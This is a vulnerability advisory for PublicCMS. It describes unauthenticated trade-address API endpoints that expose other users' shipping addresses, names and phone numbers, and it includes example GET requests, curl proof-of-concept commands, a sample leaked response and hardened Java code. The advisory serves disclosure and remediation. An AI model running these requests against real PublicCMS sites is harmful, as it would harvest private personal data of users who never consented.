PublicCMS Pre-Auth Anonymous Trade Address API Disclosure of Other Users’ Shipping Addresses and Phone Numbers
Project: PublicCMS
Repository: https://github.com/sanluan/PublicCMS
Vulnerability ID: VPLUS-2026-24555
Title: Pre-Authentication Anonymous Access in PublicCMS Allows Disclosure of Other Users’ Shipping Addresses and Phone Numbers
Description: A sensitive data exposure vulnerability exists in the PublicCMS trade address query functionality. The affected directives inherit from AbstractTemplateDirective but do not override needAppToken() or needUserToken(), which leaves the following endpoints accessible to unauthenticated users:
/api/directive/trade/addressList
/api/directive/trade/address
Because these endpoints do not enforce authentication or authorization, an attacker can query address data belonging to arbitrary users by supplying a userId or address id. The API responses expose TradeAddress entity data directly, including highly sensitive fields such as:
address
addressee
telephone
userId
This allows an unauthenticated attacker to enumerate users and retrieve shipping addresses, recipient names, and phone numbers in bulk.
Affected Component: PublicCMS trade module
Affected File: publiccms-trade/src/main/java/com/publiccms/views/directive/trade/TradeAddressListDirective.java
Affected Function: execute
Technical Root Cause: The vulnerable directives rely on AbstractTemplateDirective defaults and do not explicitly require application or user tokens. In addition, the query logic accepts attacker-controlled userId and id parameters without verifying that the requested address belongs to the current authenticated user.
Attack Vector: Remote, unauthenticated attacker sending crafted GET requests.
Example Requests:
GET /api/directive/trade/addressList?userId=6&pageSize=20
GET /api/directive/trade/address?id=4
Proof of Concept:
curl -sS 'http://<host>:8080/api/directive/trade/addressList?userId=6&pageSize=20'
curl -sS 'http://<host>:8080/api/directive/trade/address?id=4'
Observed Behavior: The application returns HTTP 200 and exposes another user’s shipping address information without requiring login, cookies, or tokens.
Example Response:
{"page":{"firstPage":true,"firstResult":0,"lastPage":true,"list":[{"address":"Leak Test Address 1774527292","addressee":"Leak Victim","createDate":1774527294000,"id":4,"telephone":"15500001111","userId":"6"}],"nextPage":1,"pageIndex":1,"pageSize":20,"prePage":1,"prevPage":1,"totalCount":1,"totalPage":1}}
{"object":{"address":"Leak Test Address 1774527292","addressee":"Leak Victim","createDate":1774527294000,"id":4,"telephone":"15500001111","userId":"6"}}
Security Impact: This vulnerability exposes personally identifiable information belonging to other users. Attackers can harvest full shipping addresses, recipient names, and phone numbers without authentication, creating risks of privacy violations, fraud, phishing, social engineering, and large-scale data scraping.
Severity: High
CVSS: 8.1
Remediation Recommendations:
- Require authentication for both address list and address detail directives.
- Enforce authorization checks to ensure users can only access their own address records.
- Do not allow the client to specify arbitrary userId values for data retrieval.
- Minimize serialized output and mask sensitive fields such as phone numbers and addresses.
- Add monitoring, enumeration protection, and rate limiting for sensitive endpoints.
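One way to apply the first three remediation items to the root cause described above, shown as an added illustration that is not PublicCMS's own code: it relies on the needAppToken()/needUserToken() hooks named in the advisory, and assumes the names RenderHandler, getUser(handler), TradeAddressService, PageHandler and the getPage(...) signature, which are not taken from the page.

```java
import java.io.IOException;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;

import com.publiccms.common.handler.PageHandler;
import com.publiccms.common.handler.RenderHandler;
import com.publiccms.entities.sys.SysUser;
import com.publiccms.logic.service.trade.TradeAddressService;
import com.publiccms.views.directive.AbstractTemplateDirective;

// Hardened address-list directive (added illustration; service, handler and
// helper names below are assumed, not copied from the PublicCMS source).
@Component
public class TradeAddressListDirective extends AbstractTemplateDirective {

    @Autowired
    private TradeAddressService service;

    @Override
    public void execute(RenderHandler handler) throws IOException, Exception {
        // Because needUserToken() returns true, the framework is expected to
        // have rejected any request without a valid user token before this
        // point; getUser() (assumed helper) yields that token's owner.
        SysUser user = getUser(handler);
        if (null == user) {
            return; // defensive: render nothing for an anonymous caller
        }
        // The owner comes from the token, never from a client-supplied
        // userId parameter, so one user cannot page through another's records.
        PageHandler page = service.getPage(user.getSiteId(), user.getId(),
                handler.getInteger("pageIndex", 1),
                handler.getInteger("pageSize", 20));
        handler.put("page", page).render();
    }

    @Override
    public boolean needAppToken() {
        return true; // every call must carry a registered application token
    }

    @Override
    public boolean needUserToken() {
        return true; // and a user token bound to an authenticated account
    }
}
```

The single-record directive needs the same two overrides plus an ownership comparison (the loaded address's userId must equal the token owner's id) before anything is rendered, and the serialized entity should omit or mask telephone and address where the template does not need them.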